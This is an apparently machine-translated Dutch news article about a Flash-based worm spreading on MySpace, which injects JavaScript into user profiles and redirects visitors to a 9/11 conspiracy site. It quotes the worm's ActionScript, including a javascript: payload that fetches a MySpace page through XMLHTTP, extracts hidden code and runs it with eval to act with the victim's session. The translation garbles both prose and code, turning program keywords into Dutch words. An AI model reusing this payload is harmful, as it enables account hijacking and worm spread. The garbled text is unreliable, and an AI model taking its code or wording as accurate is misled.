MySpace is besmet door Flits gebaseerde (swf) worm die snel uitspreidend door MySpace. Het bedt code JavaScript in de profielen van gebruikers in die bezoekers die opnieuw richt aan een plaats de overheid van de V.S. achter de 9/11 terroristenaanvallen, Symantec gewaarschuwde Maandag was eisen. Nochtans kan het enkel het uiteinde van de ijsberg zijn. Neem een blik bij hoe het werkt om te begrijpen hoe het gemakkelijk kan worden gewijzigd om veel het verwoesten nuttige lading te leveren.

De naamloze worm is niet kwaadwillig maar het dossier dat van de Schokgolf van de Flits (.swf) de nuttige lading bevat bedt JavaScript in het profiel van om het even welke gebruiker MySpace in die het .swf dossier bekijkt. Dit kan Samy gemakkelijk herhalen is mijn vrienden worm zonder een zweet te breken.

Deze javascriptcode zou dan ge�nterpreteerd door om het even welke gebruiker die de plaats die bezocht, die gevoelige gegevens toelaat om, zoals een knoeiboelwaarde worden gestolen die wordt vereist om verrichtingen als gebruiker uit te voeren, en handelingen namens die gebruikers (zonder toestemming duidelijk) uitvoert. Momenteel, dat de toegang wordt gebruikt om de code JavaScript aan andere profielen op de populaire sociale netwerkplaats slechts uit te spreiden.

Als de nuttige lading kwaadwillig is, kan het secundaire aanvallen uitvoeren als het richten van onlangs ontdekte kwetsbaarheid die de inhoud van Microsoft Office be�nvloeden. Het effect zou blootstellend zelfs gevoelige informatie over uw harde schijf veel hoger zijn.

Neem een blik bij de worm, dankzij onderzoek door kinematic.theory:

Toen u een reeds besmette pagina bezocht, is er een ingebed voorwerp van de Flits (redirect.swf) dat actionscript bevat:
getURL (url);

Het opent en richt u aan gespecificeerde blog URL opnieuw.

Op dit blog url is er een ander ingebed flitsdossier - retrievecookie.swf. Het bevat:

getURL (javas \ n \ rcript: var x = nieuwe ActiveXObject (\ Msxml2.XMLHTTP \); x.open (\ KRIJGT \, \ http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373 \, waar); x.onreadystatechange=function () {als (x.readyState==4) {var pg=x.responseText; var sc=pg.substring (pg.indexOf (\ BX- \) +3, pg.indexOf (\ - EX \)); terwijl ((sc.indexOf (\ '
\ )! =-1)||(sc.indexOf (\ - XXX \ )! =-1)){var n=sc.indexOf (\
\ ); als (n==-1) n=sc.indexOf (\ - XXX \ '); sc=sc.substring (0, n) +sc.substring (n+5, sc.length);}; + eval (Sc);}}; + (ongeldige) x.send; , "");

Het opent een andere blogpost (verbinding) en evalueert zijn inhoud.

Deze code krijgt uw knoeiboel MySpace die iedereen om aangezien u op MySpace toestaat te handelen en om het even welke handelingen uit uw naam als het veranderen van uw wachtwoord of het toevoegen van iemand onbekend als uw vriend, om het even wat uitvoert u op MySpace kunt doen. Momenteel voegt de code een bericht aan uw profiel MySpace toe. Het gebruikt uitgebreid AJAX voor zijn verrichtingen.